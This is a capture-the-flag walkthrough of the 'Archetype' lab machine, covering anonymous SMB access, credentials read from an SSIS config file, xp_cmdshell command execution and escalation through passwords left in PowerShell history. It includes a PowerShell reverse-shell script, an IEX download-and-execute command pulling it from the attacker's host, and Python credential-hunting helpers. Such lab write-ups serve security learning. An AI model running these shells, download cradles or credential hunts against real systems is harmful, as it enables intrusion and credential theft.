ARCHETYPE

10.10.10.27


Last updated 1 year ago

Personal Remark: I thought this box was more challenging than noted. I had plenty of problems getting a successful reverse shell since there was some sort of defender software stopping certain functionalities. I also struggled to get a reverse shell that was interactive and stable. Ignoring these points, it also required knowledge of existing libraries like Impacket.

Recon

First, check that the box is reachable with ping.

ping 10.10.10.27

PING 10.10.10.27 (10.10.10.27) 56(84) bytes of data.
64 bytes from 10.10.10.27: icmp_seq=1 ttl=127 time=27.6 ms

It is reachable (the TTL of 127 is one hop below the Windows default of 128, a first hint at the OS), so run a full nmap service scan against it.

nmap-auto 10.10.10.27 all

PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
|   Target_Name: ARCHETYPE
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h48m32s, deviation: 3h07m52s, median: 24m31s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)

The notable findings are SMB on 139/445 and MSSQL on 1433. The smb-os-discovery script identifies the host as Windows Server 2019 Standard, build 17763, so this is Microsoft's own SMB implementation rather than Samba (the "Windows Server 2008 R2 - 2012" guess in the Service Info line is the less reliable fingerprint). The SQL service is Microsoft SQL Server 2017 RTM on its default port. Both deserve further enumeration: SMB for shares that might be readable without credentials, and MSSQL because a valid login there frequently leads to command execution on the host.

Enumeration

nmap -Pn -T4 --script smb-vuln* -p 139,445 10.10.10.27

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

The script flags MS08-067 (CVE-2008-4250) as LIKELY VULNERABLE, a bug that lets a remote attacker execute arbitrary code via a crafted RPC request that overflows during path canonicalization. The verdict cannot be trusted here: the affected versions in the script's own description stop at Server 2008 and the Windows 7 pre-beta, while this host is Windows Server 2019 (build 17763), so the result is a false positive from a heuristic check rather than a real finding. Unsurprisingly, this path ended up being a dead end; share enumeration is the productive route.

nmap -Pn -T4 --script=smb-enum-shares.nse -p 445 10.10.10.27

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.27\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.27\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.27\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.27\backups: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: READ
|_    Current user access: READ
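Before reading the list by hand, here is an added example (Python written for this edit, not part of the original writeup) that parses the smb-enum-shares text above and applies the triage rule that matters: a share is interesting when an anonymous client can read it and it is not IPC$, because READ/WRITE on IPC$ is the normal null-session result and gives no file access. The embedded sample is the scan output above; parse_shares, anonymous_readable, is_default_share and smbclient_commands are names chosen here.

```python
import re

# Sample input: the smb-enum-shares block from the nmap run above (copied from this page).
SAMPLE_NMAP_OUTPUT = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.27\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.27\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.27\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.27\backups:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: READ
|_    Current user access: READ
"""

# A share header looks like "|   \\HOST\NAME:"; a field line like "|     Key words: value".
SHARE_RE = re.compile(r"^\|_?\s+\\\\(?P<host>[^\\]+)\\(?P<share>[^:]+):\s*$")
FIELD_RE = re.compile(r"^\|_?\s+(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")


def parse_shares(text):
    """Turn the NSE text into one dict per share: host, share, Type, Comment and both access fields."""
    shares, current = [], None
    for line in text.splitlines():
        m = SHARE_RE.match(line)
        if m:
            current = {"host": m.group("host"), "share": m.group("share")}
            shares.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group("key").strip()] = m.group("value").strip()
    return shares


def is_default_share(name):
    """ADMIN$, IPC$ and the per-drive X$ shares exist on every Windows host and need admin rights."""
    n = name.upper()
    return n in ("ADMIN$", "IPC$") or re.fullmatch(r"[A-Z]\$", n) is not None


def anonymous_readable(shares):
    """Shares an unauthenticated client can actually read files from. IPC$ is skipped even though
    it reports READ/WRITE: that is expected in a null session (it is the named-pipe share) and
    grants no file access."""
    hits = []
    for s in shares:
        if s.get("Type", "").startswith("STYPE_IPC"):
            continue
        if "READ" in s.get("Anonymous access", "<none>"):
            hits.append(s)
    return hits


def smbclient_commands(shares):
    """Null-session smbclient command lines for each share worth a look, non-default shares first."""
    readable = anonymous_readable(shares)
    readable.sort(key=lambda s: is_default_share(s["share"]))
    return ["smbclient -N //%s/%s" % (s["host"], s["share"]) for s in readable]


if __name__ == "__main__":
    parsed = parse_shares(SAMPLE_NMAP_OUTPUT)
    for s in parsed:
        print("%-8s %-22s anon=%-10s default=%s" % (
            s["share"], s.get("Type", ""), s.get("Anonymous access", ""), is_default_share(s["share"])))
    print("\n".join(smbclient_commands(parsed)))
```

Run against a full nmap report the same way; lines outside the smb-enum-shares block do not match either pattern, so they are ignored.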

This lists four shares on the host:

  • ADMIN$ and C$: the hidden default administrative shares (remote admin and the C: drive); no access for anonymous or guest.

  • IPC$: the hidden inter-process communication share, READ/WRITE for anonymous. That is the norm for a null session (IPC$ is the named-pipe share, not a directory) and on its own gives no access to any file, although it can be connected to with smbclient //10.10.10.27/IPC$ -U guest.

  • backups: a non-default disk share with anonymous READ access, and the one worth looking at.

Connect to it as guest with an empty password (press Enter at the prompt, or add -N for a null session):

smbclient //10.10.10.27/backups -U guest

Listing the share shows a single file; fetch it with get prod.dtsConfig. It contains the following:

prod.dtsConfig
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

The connection string inside it holds the critical pieces of information:

  1. Data Source=.: the SQL Server instance on the same host, i.e. the 1433/tcp service found earlier

  2. User ID: ARCHETYPE\sql_svc (the ARCHETYPE\ prefix marks a Windows account, not a SQL login)

  3. Password: M3g4c0rp123
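As an added example (not code from the original writeup), the following Python extracts that connection string the way you would for any .dtsConfig pulled from a share: it walks every <Configuration> whose Path names a ConnectionString property, splits the OLE DB key=value pairs, and builds the matching Impacket mssqlclient.py command line. The embedded XML is the file shown above; extract_credentials, parse_connection_string and mssqlclient_command are names chosen here.

```python
import xml.etree.ElementTree as ET

# Copied from the page: the prod.dtsConfig pulled from the backups share.
PROD_DTSCONFIG = r"""<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>"""

# Names that refer to the local default instance; the real host is whoever served the file.
LOCAL_DATA_SOURCES = (".", "(local)", "localhost", "")


def parse_connection_string(value):
    """Split an OLE DB/ADO connection string into a dict; keys are case-insensitive, so lower them."""
    pairs = {}
    for part in value.split(";"):
        if "=" not in part:
            continue
        key, _, val = part.partition("=")
        pairs[key.strip().lower()] = val.strip()
    return pairs


def extract_credentials(xml_text):
    """Return one record per <Configuration> element whose Path targets a ConnectionString property."""
    root = ET.fromstring(xml_text)
    found = []
    for conf in root.iter("Configuration"):
        path = conf.get("Path", "")
        if not path.endswith("Properties[ConnectionString]"):
            continue
        node = conf.find("ConfiguredValue")
        if node is None or not node.text:
            continue
        cs = parse_connection_string(node.text)
        user = cs.get("user id", cs.get("uid", ""))
        found.append({
            "path": path,
            "data_source": cs.get("data source", cs.get("server", "")),
            "user": user,
            "password": cs.get("password", cs.get("pwd", "")),
            "database": cs.get("initial catalog", cs.get("database", "")),
            # DOMAIN\user means a Windows login, which mssqlclient.py needs -windows-auth for.
            "windows_auth": "\\" in user,
        })
    return found


def mssqlclient_command(cred, host):
    """Impacket mssqlclient.py invocation for a record: DOMAIN\\user becomes DOMAIN/user and gets
    -windows-auth; a plain SQL login is user:pass@host without the flag."""
    target = host if cred["data_source"] in LOCAL_DATA_SOURCES else cred["data_source"]
    login = cred["user"].replace("\\", "/")
    cmd = "mssqlclient.py %s:%s@%s" % (login, cred["password"], target)
    if cred["windows_auth"]:
        cmd += " -windows-auth"
    return cmd


if __name__ == "__main__":
    for cred in extract_credentials(PROD_DTSCONFIG):
        print(cred["path"])
        print("  user=%s password=%s db=%s" % (cred["user"], cred["password"], cred["database"]))
        print("  " + mssqlclient_command(cred, "10.10.10.27"))
```

A Data Source of "." only tells you the instance is local to wherever the package ran, which is why the host the file came from is substituted in.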

Exploitation

The credentials belong to a Windows account, so log in with Impacket's mssqlclient.py using Windows authentication; the host is the target itself, since Data Source=. in the file refers to the local default instance:

mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-auth

Inside the client, help lists the built-in helper commands:

SQL> help
     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd

SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

SQL> reconfigure

SQL> xp_cmdshell whoami
archetype\sql_svc

SQL> xp_cmdshell cd
C:\Windows\system32

SQL> xp_cmdshell type c:\users\sql_svc\desktop\user.txt
3e7b102e78218e935bf3f4951fec21a3

xp_cmdshell is an extended stored procedure that hands a command line to the operating system and returns its output as rows, running as the account the SQL Server service runs under. It is disabled by default, and switching it on through sp_configure requires the ALTER SETTINGS server permission (held by members of sysadmin and serveradmin), so the fact that enable_xp_cmdshell succeeds is itself a finding: sql_svc is a highly privileged login on this instance. The helper wraps the sp_configure calls, which is why its output talks about RECONFIGURE ("changed from 1 to 1" means the option was already on). whoami confirms that commands run as archetype\sql_svc, and a little searching turns up user.txt on that account's desktop.

user.txt: 3e7b102e78218e935bf3f4951fec21a3

xp_cmdshell is great and all, but it is not a real shell: every command is a separate round trip through the database, nothing (not even the working directory) persists between calls, and anything that needs a console misbehaves. The next step is a proper reverse shell, and PowerShell is a convenient way to get one. Edit the listening host and port in the following script (the author's attacking machine is 10.10.14.18, port 9000) before serving it to the target:

# Minimal TCP "command loop" shell: connect back to the listener, read one line, run the
# first word as a command with the rest as its arguments, and send the output back.
# Edit the listening host and port before hosting the file.
try { $socket = New-Object System.Net.Sockets.TcpClient('10.10.14.18', 9000) } catch { exit 1 }
$stream = $socket.GetStream()
$reader = New-Object System.IO.StreamReader($stream)
$writer = New-Object System.IO.StreamWriter($stream)
$writer.AutoFlush = $true
do {
    $writer.Write("> ")
    $line = $reader.ReadLine()      # blocks until a full line arrives; $null once the listener disconnects
    if ($line -eq $null) { break }
    $line = $line.Trim()
    if ($line -ne '' -and $line -ne 'exit') {
        $parts = $line.Split(' ')
        $cmdArgs = @()
        if ($parts.Length -gt 1) { $cmdArgs = @($parts[1..($parts.Length - 1)]) }
        try {
            # Call operator with splatted arguments; 2>&1 folds stderr into the captured text.
            $res = [string](& $parts[0] @cmdArgs 2>&1)
        } catch {
            $res = $_.Exception.Message   # an unknown command must not end the session
        }
        if ($res -ne $null) { $writer.WriteLine($res) }
    }
} while ($line -ne 'exit')
try { $writer.Close() } catch {}
$socket.Close()

To get it onto the target and run it:

  1. Host the script from the attacking machine with a throwaway web server: python -m SimpleHTTPServer 80 (or python3 -m http.server 80 on Python 3)

  2. Start a listener on the port the script connects to: nc -nvlp 9000

  3. Use xp_cmdshell to have PowerShell download the script and run it in memory:

SQL> xp_cmdshell powershell IEX(New-Object Net.Webclient).downloadString(\"http://10.10.14.18/shell.ps1\")

If this went smoothly, the netcat listener catches the connection and shows the script's > prompt.

Privilege Escalation

The next step is to escalate to Administrator. Searching the file system for leftover credentials pays off: PSReadLine keeps each user's PowerShell command history in plain text at %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt, and sql_svc's copy contains a net use command with a password typed on the command line:

type c:\users\sql_svc\appdata\roaming\microsoft\windows\powershell\psreadline\consolehost_history.txt

consolehost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!! exit

Credentials for administrator:

  • Username: administrator

  • Password: MEGACORP_4dm1n!!
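The same search generalised, as an added example that is not part of the original writeup: a small Python scanner that runs over a ConsoleHost_history.txt (copied off the box, or any user's file under C:\Users) and flags lines carrying a username, a secret or both. The sample history is constructed for this edit and includes the net.exe line from the file above; the hunt_credentials and history_path names and the pattern list are mine.

```python
import re

# Constructed sample history: the net.exe line from this page's ConsoleHost_history.txt plus
# a few made-up entries of the kinds that commonly leak secrets into shell history.
SAMPLE_HISTORY = r"""
Get-ChildItem C:\backups
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!! exit
dir
$pw = ConvertTo-SecureString 'Summer2019!' -AsPlainText -Force
Invoke-Sqlcmd -ServerInstance . -Username sa -Password 'P@ssw0rd' -Query 'select 1'
runas /user:MEGACORP\svc_backup notepad.exe
sqlcmd -S . -U sa -P "P@ssw0rd2"
""".strip()

# PSReadLine's default history location on the target; one file per user profile.
HISTORY_TEMPLATE = r"C:\Users\{user}\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"


def history_path(user):
    """Path of a given user's history file, for when you can read other profiles."""
    return HISTORY_TEMPLATE.format(user=user)


TOKEN = r'''(?:'[^']*'|"[^"]*"|\S+)'''  # a single- or double-quoted string, else one bare word

# (label, regex); the named groups "user" and "secret" are optional per pattern.
PATTERNS = [
    ("net use", re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:(?P<user>\S+)(?:\s+(?P<secret>\S+))?", re.I)),
    ("ConvertTo-SecureString", re.compile(r"ConvertTo-SecureString\s+(?P<secret>" + TOKEN + r")\s+-AsPlainText", re.I)),
    ("password argument", re.compile(r"(?:-Username|-User|-U)\s+(?P<user>\S+).*?(?:-Password|-P)\s+(?P<secret>" + TOKEN + r")", re.I)),
    ("runas", re.compile(r"\brunas\b.*?/user:(?P<user>\S+)", re.I)),
]


def hunt_credentials(history_text):
    """Scan history lines and return one hit per line that carries a username, a secret or both.
    The first matching pattern wins; '*' after net use means the password was prompted, not stored."""
    hits = []
    for lineno, line in enumerate(history_text.splitlines(), 1):
        for kind, rx in PATTERNS:
            m = rx.search(line)
            if not m:
                continue
            gd = m.groupdict()
            secret = (gd.get("secret") or "").strip("'\"")
            if secret == "*":
                secret = ""
            hits.append({"line": lineno, "kind": kind, "user": gd.get("user"),
                         "secret": secret or None, "text": line.strip()})
            break
    return hits


if __name__ == "__main__":
    print("would read:", history_path("sql_svc"))
    for h in hunt_credentials(SAMPLE_HISTORY):
        print("line %d [%s] user=%s secret=%s" % (h["line"], h["kind"], h["user"], h["secret"]))
```

A runas hit carries no password but still names an account worth trying the other recovered secrets against; extend PATTERNS with whatever tooling the target's admins use.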

Logging in with those credentials (for example through Impacket's psexec.py over the open SMB service, see the notes at the end of this page) gives an interactive shell with full administrative rights, and at that point anything is possible. Navigating to the Administrator's folder shows root.txt.

root.txt: b91ccec3305e98240082d4474b848528

Notes on the file and the tooling used above. A .dtsConfig file is an XML configuration file that applies property values to a SQL Server Integration Services (SSIS) package, which is why it carried a database connection string, credentials included. [Impacket](https://github.com/SecureAuthCorp/impacket) is a collection of Python classes for working with network protocols, and its example scripts do the heavy lifting on this box: [mssqlclient.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py) is the MSSQL client used in the exploitation step, and [psexec.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py) logs in remotely through the open SMB service with the recovered administrator credentials (same user:password@host argument form as mssqlclient.py) and provides the interactive shell used for root.txt. On a Kali box the scripts can be found in /usr/local/bin/ or in /usr/share/doc/python3-impacket/examples/; the packaged versions are also on the path as impacket-mssqlclient and impacket-psexec.